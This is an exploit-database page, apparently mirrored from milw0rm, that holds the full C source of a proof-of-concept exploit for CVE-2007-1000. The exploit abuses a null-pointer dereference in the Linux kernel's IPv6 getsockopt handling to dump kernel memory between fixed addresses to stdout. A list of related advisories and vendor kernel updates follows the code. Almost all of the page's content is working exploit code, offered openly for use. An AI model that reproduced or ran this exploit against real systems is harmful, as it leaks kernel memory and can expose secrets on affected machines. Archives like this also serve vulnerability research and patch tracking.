Lucene search
RootSSV:64800HistoryJul 01, 2014 - 12:00 a.m.
Linux Kernel < 2.6.20.2 - IPv6_Getsockopt_Sticky Memory Leak PoC
2014-07-0100:00:00
Root
www.seebug.org
10
0.0004 Low
EPSS
Percentile
0.4%
No description provided by source.
/*
* Linux Kernel IPV6_Getsockopt_Sticky Memory Leak Proof Of Concept
* dreyer 07-2007
* Osu, Tatakae, Sexy Pandas!
*
* Dumps to stdout the memory mapped between INI and END.
*
* CVE: CVE-2007-1000 BID: 22904
*
* Affected: Linux Kernel < 2.6.20.2
*
* http://bugzilla.kernel.org/show_bug.cgi?id=8134
*
* Exploitation based on null pointer dereference: http://lists.immunitysec.com/pipermail/dailydave/2007-March/004133.html
*
* For free!!! ( worth 600 EUR in zerobay! )
*
*/
#include <sys/mman.h>
#include <netinet/in.h>
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#define HOPOPT_OFFSET 8
#define INIADDR 0xc0100000
#define ENDADDR 0xd0000000
unsigned int i;
int main(int argc, char *argv[]) {
int s;
unsigned int optlen;
void *ptr;
char value[10240];
char text[12];
fprintf(stderr,"Ipv6_getsockopt_sticky vuln POC\n"
"dreyer '07 - free feels better\n"
"Dumping %p - %p to stdout\n",INIADDR,ENDADDR);
s = socket(AF_INET6, SOCK_STREAM, IPPROTO_TCP);
/* Make np->opt = NULL = 0x00000000 through IPV6_2292PKTOPTIONS */
setsockopt(s, IPPROTO_IPV6, IPV6_2292PKTOPTIONS, (void *)NULL, 0);
/* Make 0x00000000 address valid */
ptr = mmap(NULL, 4096, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
if (ptr != NULL) {
perror("mmap");
exit(-1);
}
memset(ptr,0,4096);
/* Make ptr point to np->opt->hopopt = (0x00000000)->hopopt =
* 0x00000000 + 8 */
ptr=(char *)((char *)ptr+HOPOPT_OFFSET);
i=INIADDR;
while(i<ENDADDR) {
/* Put in hopopt the address we want to read */
*((int *)ptr)=i;
optlen=10240;
/* Get the chunk pointed by hopopt through getsockopt IPV6_DSTOPTS */
getsockopt(s, IPPROTO_IPV6, IPV6_DSTOPTS, (void *)value, &optlen);
if(optlen>0) {
sprintf(text,"\n%08x:",i);
write(1,text,strlen(text));
write(1,value,optlen);
i=i+optlen;
} else {
/* We could not read this portion because of some error, skip it */
i=i+4;
}
}
return 0;
}
// milw0rm.com [2007-07-10]
Related
cert
cert
Linux Kernel vulnerable to DoS via the ipv6_getsockopt_sticky() function
2007-03-13 00:00:00
veracode
veracode
Arbitrary Memory Read
2020-04-10 00:15:28
ubuntucve
ubuntucve
CVE-2007-1000
2007-03-12 00:00:00
cve
cve
CVE-2007-1000
2007-03-12 23:19:00
packetstorm
packetstorm
linux-26202.txt
2007-07-11 00:00:00
seebug
seebug
Linux Kernel < 2.6.20.2 IPV6_Getsockopt_Sticky Memory Leak PoC
2007-07-11 00:00:00
exploitpack
exploitpack
Linux Kernel 2.6.20.2 - IPv6_Getsockopt_Sticky Memory Leak
2007-07-10 00:00:00
prion
prion
Design/Logic Flaw
2007-03-12 23:19:00
exploitdb
exploitdb
Linux Kernel < 2.6.20.2 - 'IPv6_Getsockopt_Sticky' Memory Leak
2007-07-10 00:00:00
openvas
openvas
Fedora Update for kernel FEDORA-2007-335
2009-02-27 00:00:00
Fedora Update for kernel FEDORA-2007-335
2009-02-27 00:00:00
Fedora Update for kernel FEDORA-2007-336
2009-02-27 00:00:00
fedora
fedora
[SECURITY] Fedora Core 6 Update: kernel-2.6.20-1.2925.fc6
2007-03-14 20:19:42
[SECURITY] Fedora Core 5 Update: kernel-2.6.20-1.2300.fc5
2007-03-14 20:26:01
nessus
nessus
Fedora Core 5 : kernel-2.6.20-1.2300.fc5 (2007-336)
2007-03-16 00:00:00
Fedora Core 6 : kernel-2.6.20-1.2925.fc6 (2007-335)
2007-03-16 00:00:00
RHEL 5 : kernel (RHSA-2007:0169)
2007-05-25 00:00:00
securityvulns
securityvulns
Linux setsockopt / getsockopt IPv6 DoS
2007-03-12 00:00:00
[USN-489-1] Linux kernel vulnerabilities
2007-07-19 00:00:00
centos
centos
Kernel, kernel security update
2007-05-01 23:33:28
redhat
redhat
(RHSA-2007:0169) Important: kernel security and bug fix update
2007-04-30 00:00:00
suse
suse
remote denial of service in kernel
2007-05-03 18:12:20
ubuntu
ubuntu
Linux kernel vulnerabilities
2007-07-18 00:00:00
Linux kernel vulnerabilities
2007-07-19 00:00:00
oraclelinux
oraclelinux
Important: kernel security and bug fix update
2007-06-26 00:00:00